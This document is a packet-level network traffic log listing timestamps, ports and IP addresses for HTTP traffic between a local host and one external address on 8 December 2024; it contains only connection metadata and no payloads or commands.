Dec 8, 2024 19:52:24.545511007 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.545512915 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.545547009 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.546274900 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.546320915 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.546386003 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.546426058 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.547122002 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.547158957 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.547274113 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.547318935 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.548055887 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.548095942 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.548175097 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.548218966 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.548887968 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.548926115 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.549000978 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.549043894 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.549737930 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.549834967 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.549848080 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.549885988 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.550776005 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.550801992 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.550811052 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.550836086 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.551716089 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.551753044 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.551757097 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.551795006 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.552503109 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.552551985 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.552578926 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.552619934 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.553240061 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.553277016 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.553311110 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.553348064 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.554066896 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.554105043 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.554189920 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.554228067 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.554960966 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.555001974 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.555170059 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.555212021 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.555815935 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.555855036 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.555955887 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.555998087 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.556709051 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.556756020 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.556787968 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.557075977 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.557519913 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.557559013 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.557655096 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.557694912 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.558440924 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.558490992 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.558562040 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.558604002 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.559309959 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.559357882 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.559390068 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.559431076 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.560172081 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.560220003 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.560317993 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.560362101 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.561007023 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.561023951 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.561048031 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.561059952 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.561866999 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.561904907 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.562031031 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.562298059 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.562755108 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.562792063 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.562880039 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.562916994 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.563621044 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.563668013 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.563719034 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.563756943 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.564490080 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.564538956 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.564548969 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.564582109 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.565347910 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.565383911 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.565433979 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.565469980 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.566268921 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.566320896 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.566490889 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.566529989 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.567179918 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.567222118 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.567277908 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.567322016 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.567974091 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.568034887 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.568059921 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.568097115 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.568943024 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.568954945 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.568984985 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.568995953 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.569686890 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.569721937 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.569736958 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.569756031 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.570548058 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.570591927 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.570642948 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.570681095 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.571432114 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.571484089 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.571554899 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.571594954 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.572313070 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.572360992 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.572411060 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.572460890 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.573127985 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.573170900 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.591083050 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.591125965 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.591145039 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.591181040 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.591392994 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.591430902 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.591509104 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.591546059 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.592327118 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.592364073 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.592396975 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.592434883 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.593101978 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.593142033 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.658377886 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.658452988 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.658493996 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.658538103 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.658734083 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.658778906 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.658888102 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.658938885 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.658987999 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.659033060 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.659784079 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.659843922 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.659863949 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.659915924 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.660586119 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.660624027 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.734812975 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.734999895 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.735081911 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.735145092 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.735264063 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.735308886 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.735392094 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.735433102 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.736028910 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.736078024 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.736148119 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.736193895 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.737018108 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.737063885 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.737124920 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.737170935 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.737863064 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.737907887 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.737940073 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.737978935 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.738697052 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.738745928 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.738826036 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.738869905 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.739584923 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.739630938 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.739666939 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.739706993 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.740406990 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.740452051 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.740587950 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.740638018 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.741255045 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.741301060 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.741411924 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.741456032 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.742136002 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.742178917 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.742269993 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.742314100 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.743010998 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.743053913 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.743132114 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.743176937 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.743947029 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.743992090 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.744028091 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.744066000 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.744848013 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.744891882 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.744921923 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.744961023 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.745584965 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.745646954 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.745724916 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.745767117 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.746519089 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.746571064 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.746634007 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.746680021 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.747564077 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.747605085 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.747682095 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.747728109 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.748507023 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.748545885 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.748611927 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.748658895 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.749552965 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.749599934 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.749720097 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.749764919 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.750432968 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.750473976 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.750916958 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.750957012 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.752017021 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.752059937 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.752161026 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.752172947 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.752211094 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.752531052 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.752574921 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.753367901 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.753416061 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.753478050 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.753535032 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.753951073 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.753993988 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.754076958 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.754122019 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.754695892 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.754736900 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.754755974 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.754801989 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.755501986 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.755548000 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.755630016 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.755692005 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.756304979 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.756351948 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.756401062 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.756445885 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.757241964 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.757287979 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.757354975 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.757397890 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.760024071 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.760035992 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.760046959 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.760072947 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.760102034 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.760142088 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.760185003 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.760205984 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.760219097 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.760246038 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.760818005 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.760863066 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.760910988 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.760951996 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.761668921 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.761713982 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.761852980 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.761907101 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.762594938 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.762638092 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.762813091 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.762856007 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.763387918 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.763431072 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.763485909 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.763530970 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.764774084 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.764818907 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.764980078 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.764995098 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.765023947 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.765038013 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.765086889 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.765127897 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.765583992 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.765625954 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.768472910 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.768522978 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.768544912 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.768557072 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.768568039 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.768587112 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.768610001 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.804982901 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.924371958 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.261904955 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.261965036 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.262017012 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.262166023 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.262303114 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.262345076 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.262484074 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.262499094 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.262525082 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.262537956 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.263494015 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.263564110 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.263592005 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.263650894 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.264307022 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.264379025 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.264427900 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.264473915 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.265139103 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.265201092 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.265244961 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.265320063 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.266048908 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.266097069 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.266151905 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.266237974 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.266870022 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.266922951 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.266957998 CET	80	49748	185.215.113.206	192.168.2.4
